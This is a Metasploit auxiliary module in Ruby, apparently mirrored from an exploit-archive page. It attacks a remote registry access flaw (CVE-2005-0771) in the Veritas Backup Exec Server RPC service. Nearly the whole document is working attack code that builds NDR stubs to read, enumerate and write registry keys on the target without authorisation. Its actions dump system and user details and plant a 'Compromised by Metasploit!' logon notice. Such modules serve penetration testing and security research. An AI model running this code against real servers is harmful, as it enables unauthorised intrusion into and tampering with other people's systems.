Share
## https://sploitus.com/exploit?id=PACKETSTORM:180900
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Post::Windows::Registry
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Server Registry Access',
'Description' => %q{
This modules exploits a remote registry access flaw in the BackupExec Windows
Server RPC service. This vulnerability was discovered by Pedram Amini and is based
on the NDR stub information posted to openrce.org.
Please see the action list for the different attack modes.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '17627' ],
[ 'CVE', '2005-0771' ],
[ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],
],
'Actions' =>
[
['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],
['Create Logon Notice', 'Description' => 'Add a logon notice']
],
'DefaultAction' => 'System Information'
))
register_options(
[
Opt::RPORT(6106),
OptString.new('WARN',
[
false,
"The warning to display for the Logon Notice action",
"Compromised by Metasploit!\r\n"
]
),
])
end
def auxiliary_commands
return {
"regread" => "Read a registry value",
# "regenum" => "Enumerate registry keys",
}
end
def run
case action.name
when 'System Information'
system_info()
when 'Create Logon Notice'
logon_notice()
end
end
def cmd_regread(*args)
if (args.length == 0)
print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
return
end
paths = args[0].split("\\")
hive = paths.shift
subval = paths.pop
subkey = paths.join("\\")
data = backupexec_regread(hive, subkey, subval)
if (data)
print_status("DATA: #{deunicode(data)}")
else
print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
end
end
def cmd_regenum(*args)
if (args.length == 0)
print_status("Usage: regenum HKLM\\\\Software")
return
end
paths = args[0].split("\\")
hive = paths.shift
subkey = "\\" + paths.join("\\")
data = backupexec_regenum(hive, subkey)
if (data)
print_status("DATA: #{deunicode(data)}")
else
print_error("Failed to enumerate #{hive}\\#{subkey}...")
end
end
def system_info
print_status("Dumping system information...")
prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'
print_status("The current interactive user is #{deunicode(username)}")
print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
print_status("The system runs on a #{deunicode(cpu)}")
end
def logon_notice
print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
end
def deunicode(str)
str.gsub(/\x00/, '').strip
end
#
# Write a registry key
#
def backupexec_regwrite(hive, subkey, subval, type, data)
stub = backupexec_regrpc_write(
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:type => type,
:data => data
)
resp = backupexec_regrpc_call(5, stub)
return false if resp.length == 0
return true
end
#
# Read a registry key
#
def backupexec_regread(hive, subkey, subval, type = REG_SZ)
stub = backupexec_regrpc_read(
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:type => type
)
resp = backupexec_regrpc_call(4, stub)
return nil if resp.length == 0
ret, len = resp[0,8].unpack('VV')
return nil if ret == 0
return nil if len == 0
return resp[8, len]
end
#
# Enumerate a registry key
#
def backupexec_regenum(hive, subkey)
stub = backupexec_regrpc_enum(
:hive => registry_hive_lookup(hive),
:subkey => subkey
)
resp = backupexec_regrpc_call(7, stub)
p resp
return nil if resp.length == 0
ret, len = resp[0,8].unpack('VV')
return nil if ret == 0
return nil if len == 0
return resp[8, len]
end
#
# Call the backupexec registry service
#
def backupexec_regrpc_call(opnum, data = '')
handle = dcerpc_handle(
'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
'ncacn_ip_tcp', [datastore['RPORT']]
)
dcerpc_bind(handle)
resp = dcerpc.call(opnum, data)
outp = ''
if (dcerpc.last_response and dcerpc.last_response.stub_data)
outp = dcerpc.last_response.stub_data
end
disconnect
outp
end
# RPC Service 4
def backupexec_regrpc_read(opts = {})
subkey = opts[:subkey] || ''
subval = opts[:subval] || ''
hive = opts[:hive] || HKEY_LOCAL_MACHINE
type = opts[:type] || REG_SZ
stub =
NDR.UnicodeConformantVaryingString(subkey) +
NDR.UnicodeConformantVaryingString(subval) +
NDR.long(type) +
NDR.long(1024) +
NDR.long(0) +
NDR.long(4) +
NDR.long(4) +
NDR.long(hive)
return stub
end
# RPC Service 7
def backupexec_regrpc_enum(opts = {})
subkey = opts[:subkey] || ''
hive = opts[:hive] || HKEY_LOCAL_MACHINE
stub =
NDR.UnicodeConformantVaryingString(subkey) +
NDR.long(4096) +
NDR.long(0) +
NDR.long(4) +
NDR.long(4) +
NDR.long(hive)
return stub
end
# RPC Service 5
def backupexec_regrpc_write(opts = {})
subkey = opts[:subkey] || ''
subval = opts[:subval] || ''
hive = opts[:hive] || HKEY_LOCAL_MACHINE
type = opts[:type] || REG_SZ
data = opts[:data] || ''
if (type == REG_SZ || type == REG_EXPAND_SZ)
data = Rex::Text.to_unicode(data+"\x00")
end
stub =
NDR.UnicodeConformantVaryingString(subkey) +
NDR.UnicodeConformantVaryingString(subval) +
NDR.long(type) +
NDR.long(data.length) +
NDR.long(data.length) +
data +
NDR.align(data) +
NDR.long(4) +
NDR.long(4) +
NDR.long(hive)
return stub
end
end